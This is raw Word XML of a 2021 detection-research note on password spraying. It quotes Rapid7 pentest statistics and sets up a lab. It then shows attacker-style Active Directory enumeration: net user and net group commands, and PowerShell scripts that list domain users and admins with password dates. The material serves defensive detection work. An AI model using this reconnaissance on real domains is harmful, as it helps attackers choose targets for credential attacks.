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00000" w:rsidRDefault="00D91F86" w14:paraId="13ED055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40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Password Spraying - Detection Research</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="06F1D1A4" w14:textId="7777777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Sunday, May 16, 2021</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="0604328F" w14:textId="77777777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2:23 AM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="6A145158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91F86" w14:paraId="28817C0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-- Dan Grindall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="0A80EBD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dan.grindall@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="0EE39CC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D0133D6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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="422E7A86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Background for Password Spraying</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="0C1F421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Why should you care about detecting password spraying? Because it works!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidP="59524FF0" w:rsidRDefault="00D91F86" w14:paraId="26375D46" w14:textId="2050D23A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  <w:r w:rsidRPr="59524FF0" w:rsidR="59524FF0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="59524FF0" w:rsidP="59524FF0" w:rsidRDefault="59524FF0" w14:paraId="098918A8" w14:textId="02199DED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noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="59524FF0" w:rsidR="59524FF0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">From Rapid7 "Under The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="59524FF0" w:rsidR="59524FF0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hoddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="59524FF0" w:rsidR="59524FF0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2019 Research Report"; A Survey to Pentest Organizations:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="59524FF0" w:rsidR="59524FF0">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto" w:cs="Roboto"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="21B3CD"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CREDENTIAL CAPTURE: HOW DID YOU OBTAIN PASSWORDS OR PASSWORD HASHES?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="59524FF0" w:rsidP="59524FF0" w:rsidRDefault="59524FF0" w14:paraId="45CBC0B4" w14:textId="6A405D75">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="459E8908" wp14:anchorId="2F205BF9">
            <wp:extent cx="6619876" cy="3434060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31757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61911228141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9876" cy="34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AD0695" w:rsidP="30AD0695" w:rsidRDefault="30AD0695" w14:paraId="64BEB2B9" w14:textId="6CB093B1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto" w:cs="Roboto"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="21B3CD"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="59524FF0" w:rsidP="59524FF0" w:rsidRDefault="59524FF0" w14:paraId="01E90C17" w14:textId="71074ACA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noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="59524FF0" w:rsidR="59524FF0">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto" w:cs="Roboto"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="21B3CD"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GUESSABLE CRACKED PASSWORDS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="59524FF0" w:rsidP="59524FF0" w:rsidRDefault="59524FF0" w14:paraId="0A1B6ECA" w14:textId="4F4A1560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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="3B934F4C" wp14:anchorId="53585CED">
            <wp:extent cx="6505575" cy="1219795"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2127320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98ef2102e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2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4FF0" w:rsidP="59524FF0" w:rsidRDefault="59524FF0" w14:paraId="509A3F26" w14:textId="42AC0613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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="21B3CD"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="59524FF0" w:rsidP="59524FF0" w:rsidRDefault="59524FF0" w14:paraId="2A25803C" w14:textId="1422BB80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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="59524FF0" w:rsidR="59524FF0">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:eastAsia="Roboto" w:cs="Roboto"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="21B3CD"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXTERNAL ENGAGEMENT: HOW EFFECTIVE WERE LOCKOUTS?</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="6E09B347" wp14:anchorId="7D8DE57A">
            <wp:extent cx="6583680" cy="1714500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="77053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66fda5158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524FF0" w:rsidP="59524FF0" w:rsidRDefault="59524FF0" w14:paraId="65E5B0AB" w14:textId="7908C53A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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="59524FF0" w:rsidR="59524FF0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Source: </w:t>
      </w:r>
      <w:hyperlink r:id="R91796febb72b4078">
        <w:r w:rsidRPr="59524FF0" w:rsidR="59524FF0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.rapid7.com/research/reports/under-the-hoodie-2020/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="59524FF0" w:rsidR="59524FF0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidP="59524FF0" w:rsidRDefault="00D91F86" w14:paraId="5919288D" w14:textId="77777777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  <w:r w:rsidRPr="59524FF0" w:rsidR="59524FF0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="59524FF0" w:rsidP="59524FF0" w:rsidRDefault="59524FF0" w14:paraId="3909DD8C" w14:textId="34936060">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="35359293" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0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> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="6344D3B6" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0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> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="627AE3CD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Lab Environment for Research</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="1F8224E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ECDE424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~ All POC testing, screenshots created using Detection Lab: </w:t>
      </w:r>
      <w:hyperlink w:history="1" r:id="rId7">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.detectionlab.network/introduction/</w:t>
        </w:r>
      </w:hyperlink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BB62474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Create Fake accounts for POC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="35A134C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hyperlink w:history="1" r:id="rId8">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https:/</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>/www.darkoperator.com/blog/2016/7/30/creating-real-looking-user-accounts-in-ad-lab</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="0472B0C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EF581A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B7B29E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F0334A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9087556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48A4FC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30AD0695" w:rsidR="30AD0695">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="30AD0695" w:rsidP="30AD0695" w:rsidRDefault="30AD0695" w14:paraId="4DA12C93" w14:textId="66047443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C57EE10" w14:textId="021B22B5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0518C9AA" w14:textId="5422298C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00000000" w:rsidRDefault="00D91F86" w14:paraId="4922DEC8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Enumerate Domain Users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="59C96A8F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net user /domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="1F09C9D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591FBED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472A31" wp14:editId="4B2A7224">
            <wp:extent cx="7296150" cy="6800850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="C: user /domain &#10;The request will be processed at a domain controller for domain Windomain . local. &#10;User accounts for .windomain . local &#10;Abbecit1945 &#10;oy19SØ &#10;ursent &#10;Aften19S9 &#10;Agaricest &#10;Ala rat &#10;Alose1961 &#10;Andindeford &#10;An turing &#10;Arday1952 &#10;Arithe198e &#10;Atiousaing &#10;Bace1946 &#10;Bannined &#10;Beepa rd &#10;Begrommento &#10;Belton st1end1969 &#10;Beting1975 &#10;Blace1969 &#10;Bleave &#10;reventowne79 &#10;Butervirty &#10;Capecontabir &#10;Chalmleshe &#10;Chishat &#10;Clont1957 &#10;Cometwou &#10;Con tret &#10;Abought &#10;Abs told &#10;Adea timeng92 &#10;Afterested &#10;Aidly1955 &#10;Alla shom &#10;An dedl 994 &#10;Anningues &#10;An ke s48 &#10;Aredy1955 &#10;Asc rina &#10;At:u rnevel &#10;Bagall &#10;Ba rdec ome &#10;Beety1951 &#10;Belank &#10;Benife &#10;Bevold &#10;Bla rly &#10;Bobbles &#10;Broplece &#10;Caliat &#10;Caphistry &#10;Chaver196Ø &#10;Chiss1947 &#10;Coa rad &#10;Comints &#10;coug1972 &#10;Abountich &#10;Acte1947 &#10;Administrator &#10;Aganythe &#10;Ajoilver &#10;Aloost &#10;Andest &#10;An stating &#10;Apta te &#10;Aret1969 &#10;Asecou1ded54 &#10;Austeset &#10;Bagith &#10;Beemed &#10;Begic ke &#10;Belikee &#10;Bersoones &#10;Bity1956 &#10;Blanay &#10;Bra10'.a &#10;Buliesson &#10;Camigniont &#10;Carceses &#10;Cherthem &#10;Clachaps &#10;Coma 0002 &#10;Complem &#10;Cou s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 user /domain &#10;The request will be processed at a domain controller for domain Windomain . local. &#10;User accounts for .windomain . local &#10;Abbecit1945 &#10;oy19SØ &#10;ursent &#10;Aften19S9 &#10;Agaricest &#10;Ala rat &#10;Alose1961 &#10;Andindeford &#10;An turing &#10;Arday1952 &#10;Arithe198e &#10;Atiousaing &#10;Bace1946 &#10;Bannined &#10;Beepa rd &#10;Begrommento &#10;Belton st1end1969 &#10;Beting1975 &#10;Blace1969 &#10;Bleave &#10;reventowne79 &#10;Butervirty &#10;Capecontabir &#10;Chalmleshe &#10;Chishat &#10;Clont1957 &#10;Cometwou &#10;Con tret &#10;Abought &#10;Abs told &#10;Adea timeng92 &#10;Afterested &#10;Aidly1955 &#10;Alla shom &#10;An dedl 994 &#10;Anningues &#10;An ke s48 &#10;Aredy1955 &#10;Asc rina &#10;At:u rnevel &#10;Bagall &#10;Ba rdec ome &#10;Beety1951 &#10;Belank &#10;Benife &#10;Bevold &#10;Bla rly &#10;Bobbles &#10;Broplece &#10;Caliat &#10;Caphistry &#10;Chaver196Ø &#10;Chiss1947 &#10;Coa rad &#10;Comints &#10;coug1972 &#10;Abountich &#10;Acte1947 &#10;Administrator &#10;Aganythe &#10;Ajoilver &#10;Aloost &#10;Andest &#10;An stating &#10;Apta te &#10;Aret1969 &#10;Asecou1ded54 &#10;Austeset &#10;Bagith &#10;Beemed &#10;Begic ke &#10;Belikee &#10;Bersoones &#10;Bity1956 &#10;Blanay &#10;Bra10'.a &#10;Buliesson &#10;Camigniont &#10;Carceses &#10;Cherthem &#10;Clachaps &#10;Coma 0002 &#10;Complem &#10;Cou ser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5C7A885D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3CE4CBF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Get Domain Admins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="7C6329FA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net group "Domain Admins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>" /domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="034E5FE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0C29D3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Get User Details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net user &lt;username&gt; /domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="75159DC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952833B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669AED6" wp14:editId="0F6526D4">
            <wp:extent cx="8934450" cy="7810500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="C: group &quot;Domain Admins&quot; [domain &#10;The request will be processed at a domain controller for domain Windomain . local. &#10;Group name &#10;Commen t &#10;Members &#10;Domain Admins &#10;Designated administra tors of the domain &#10;Administra tor &#10;secopsadmin &#10;'The command completed successfully. &#10;C: user secopsadmin [domain &#10;The request will be processed at a domain controller for domain Windomain . local. &#10;User name &#10;Full Name &#10;Commen t &#10;User's comment &#10;Coun try (region code &#10;Account active &#10;Account expires &#10;Password last set &#10;Password expires &#10;Password changeable &#10;Password required &#10;ser may change password &#10;norkstations allowed &#10;Logon script &#10;User profile &#10;Home directory &#10;Last logon &#10;secopsadmin &#10;SecOps Admin &#10;Secops Use - AR7734992 &#10;eØØ (System Default) &#10;Yes &#10;Never &#10;(5/116/12021 &#10;Never &#10;17/12021 RI &#10;Yes &#10;Yes &#10;All &#10;16/1 202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 group &quot;Domain Admins&quot; [domain &#10;The request will be processed at a domain controller for domain Windomain . local. &#10;Group name &#10;Commen t &#10;Members &#10;Domain Admins &#10;Designated administra tors of the domain &#10;Administra tor &#10;secopsadmin &#10;'The command completed successfully. &#10;C: user secopsadmin [domain &#10;The request will be processed at a domain controller for domain Windomain . local. &#10;User name &#10;Full Name &#10;Commen t &#10;User's comment &#10;Coun try (region code &#10;Account active &#10;Account expires &#10;Password last set &#10;Password expires &#10;Password changeable &#10;Password required &#10;ser may change password &#10;norkstations allowed &#10;Logon script &#10;User profile &#10;Home directory &#10;Last logon &#10;secopsadmin &#10;SecOps Admin &#10;Secops Use - AR7734992 &#10;eØØ (System Default) &#10;Yes &#10;Never &#10;(5/116/12021 &#10;Never &#10;17/12021 RI &#10;Yes &#10;Yes &#10;All &#10;16/1 2021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4D81413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2B0434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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>~ Alternate methods of Enumerating Domain U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sers and Domain Admins via Powershell. Emumeration behavior will vary dependong on attacker's framework and preference. Can't rely on detecting specific commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="6F11181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DD6E1F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30AD0695" w:rsidR="30AD0695">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:hyperlink r:id="Rbe8b2bf67e554aa0">
        <w:r w:rsidRPr="30AD0695" w:rsidR="30AD0695">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.jaapbrasser.com/active-directory-friday-list-password-information-for-domain-administrators/</w:t>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="30AD0695" w:rsidR="30AD0695">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="30AD0695" w:rsidP="30AD0695" w:rsidRDefault="30AD0695" w14:paraId="456C678B" w14:textId="5F1D05C4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206D745F" w14:textId="7E3E58BF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77E40EE5" w14:textId="4E47E251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1539514A" w14:textId="6D10C245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00000000" w:rsidRDefault="00D91F86" w14:paraId="37A8451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Alternate method to enumerate domain users via Powershell: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# enum_domain_users.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="4D6FFE7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Note that 2016 domain contro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>llers always display lastlogin date as 1/1/1601 - Known Bug for LDAP simple bind.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto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40"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="7D97A437" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="905796268"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1348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91F86" w14:paraId="5C810286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$Searcher = New-Object DirectoryServices.DirectorySearcher -Property @{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="5C4AC7D6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Filter = "(objectclass=user)"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="3BE151EE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PageSize = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="4E10F499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  <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="7B8462F3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$Searcher.FindAll() | ForEach-Object {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="20D50E86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New-Ob</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ject -TypeName PSCustomObject -Property @{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="289AE31A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samaccountname = $_.Properties.samaccountname -join ''</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="59072DAB" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="54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pwdlastset = [datetime]::FromFileTime([int64]($_.Properties.pwdlastset -join ''))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="036FCF11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LastLogonDate = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>[datetime]::FromFileTime([int64]($_.Properties.LastLogonDate -join ''))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="73677FC3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enabled = -not [boolean]([int64]($_.properties.useraccountcontrol -join '') -band 2)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="649D4BB5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:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="016E3FF1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:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="3D83BD8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209D60F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Example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="4E65A8E8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68F59C0" wp14:editId="3472E036">
            <wp:extent cx="7981950" cy="556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2D0DB39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1B044A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Alternate method to enumerate domain admins via Powershell: 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# enum_domain_admins.ps1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 xml:space="preserve"># Note that 2016 domain controllers always display lastlogin date as 1/1/1601 - Known bug for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LDAP simple bind</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto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40"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="2FE5C24E" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="51928305"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1291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91F86" w14:paraId="6246CAD4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$Searcher = New-Object DirectoryServices.DirectorySearcher -Property @{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="50E01324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Filter = "(memberof=CN=Domain Admins,CN=Users,DC=windomain,DC=local)"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="3F4B1AAE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PageSize = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="3F4B4D71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  <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="46E6C5C9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$Searcher.FindAll() | ForEach-Object {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="1E3E92C7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New-Object -TypeName PSCustomOb</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ject -Property @{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="61919F34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samaccountname = $_.Properties.samaccountname -join ''</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="2A956F99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pwdlastset = [datetime]::FromFileTime([int64]($_.Properties.pwdlastset -join ''))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="41E71507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LastLogonDate = [datetime]::FromFileTime([int64]($_.Properties.LastLogonDate </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-join ''))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="591E7C37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enabled = -not [boolean]([int64]($_.properties.useraccountcontrol -join '') -band 2)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="01903F8C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:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="15E2911D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:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="1C5BF53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EDB8DD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Example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="17DC880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25AF808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1039B4" wp14:editId="2782902D">
